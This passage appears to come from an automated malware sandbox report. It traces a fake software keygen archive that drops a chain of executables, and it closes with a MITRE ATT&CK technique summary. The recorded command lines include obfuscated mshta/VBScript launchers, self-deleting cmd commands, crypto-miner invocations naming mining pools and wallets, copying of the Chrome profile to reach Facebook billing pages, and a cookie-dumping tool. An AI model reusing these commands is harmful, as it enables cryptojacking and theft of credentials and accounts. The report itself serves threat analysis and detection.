                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3824 /prefetch:2
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5952
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:2748
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                      1⤵
                                                                                                                        PID:2572
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                        1⤵
                                                                                                                          PID:2536
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                          1⤵
                                                                                                                            PID:1900
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                            1⤵
                                                                                                                              PID:1448
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                              1⤵
                                                                                                                                PID:1292
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                1⤵
                                                                                                                                  PID:1216
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1088
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                    1⤵
                                                                                                                                      PID:296
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1360
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:4776
                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:5880
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.key.code.generator.zip\Altova.Xmlspy.2011.Enterprise.key.code.generator.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.key.code.generator.zip\Altova.Xmlspy.2011.Enterprise.key.code.generator.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:6012
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                            2⤵
                                                                                                                                              PID:6108
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                keygen-pr.exe -p83fsase3Ge
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4644
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4260
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4848
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                  keygen-step-1.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4140
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                  keygen-step-5.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4252
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF """" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4168
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4112
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe
                                                                                                                                                            D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3516
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF ""/pnPuKn3KQlE3bNFqBn"" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                              7⤵
                                                                                                                                                                PID:5460
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "/pnPuKn3KQlE3bNFqBn" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:5484
                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                  "C:\Windows\System32\regsvr32.exe" -u BZLY.W /s
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                  PID:852
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill -IM "keygen-step-5.exe" /F
                                                                                                                                                                6⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5396
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                          keygen-step-2.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          PID:4468
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\B1F6.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\B1F6.tmp.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:5100
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\B1F6.tmp.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4744
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:4860
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5404
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:1584
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                              keygen-step-3.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5048
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4500
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:4676
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                keygen-step-4.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4196
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:4276
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4972
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:4832
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\BE2B.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\BE2B.tmp.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:5724
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\BE2B.tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\BE2B.tmp.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:5636
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\C07E.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\C07E.tmp.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:5700
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w2612 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                      PID:5804
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w6772@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:5828
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2192
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:4760
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                      PID:4980
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4820
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:6108
                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                          xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:4956
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:4312
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc6e824f50,0x7ffc6e824f60,0x7ffc6e824f70
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4308
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1704 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:4036
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2240 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:1812
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:2
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6008
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2724 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5300
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5228
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:3872
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4572
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:4420
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5500
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5712 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:5912
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14236998398274036789,17834928432602355763,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5652 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:3960
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          PID:5460
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4984
                                                                                                                                                                                          • C:\ProgramData\4632879.exe
                                                                                                                                                                                            "C:\ProgramData\4632879.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:1304
                                                                                                                                                                                          • C:\ProgramData\1595019.exe
                                                                                                                                                                                            "C:\ProgramData\1595019.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:5688
                                                                                                                                                                                            • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                              "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4556
                                                                                                                                                                                          • C:\ProgramData\7146847.exe
                                                                                                                                                                                            "C:\ProgramData\7146847.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:1688
                                                                                                                                                                                            • C:\ProgramData\7146847.exe
                                                                                                                                                                                              "{path}"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4356
                                                                                                                                                                                          • C:\ProgramData\1071125.exe
                                                                                                                                                                                            "C:\ProgramData\1071125.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:2972
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:196
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4476
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:1276
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:5836
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:512

                                                                                                                                                                                  Network

                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                  Persistence

                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                  1
                                                                                                                                                                                  T1060

                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                  2
                                                                                                                                                                                  T1112

                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                  1
                                                                                                                                                                                  T1130

                                                                                                                                                                                  Credential Access

                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                  4
                                                                                                                                                                                  T1081

                                                                                                                                                                                  Discovery

                                                                                                                                                                                  Query Registry

                                                                                                                                                                                  3
                                                                                                                                                                                  T1012

                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                  4
                                                                                                                                                                                  T1082

                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1018

                                                                                                                                                                                  Collection

                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                  4
                                                                                                                                                                                  T1005

                                                                                                                                                                                  Command and Control

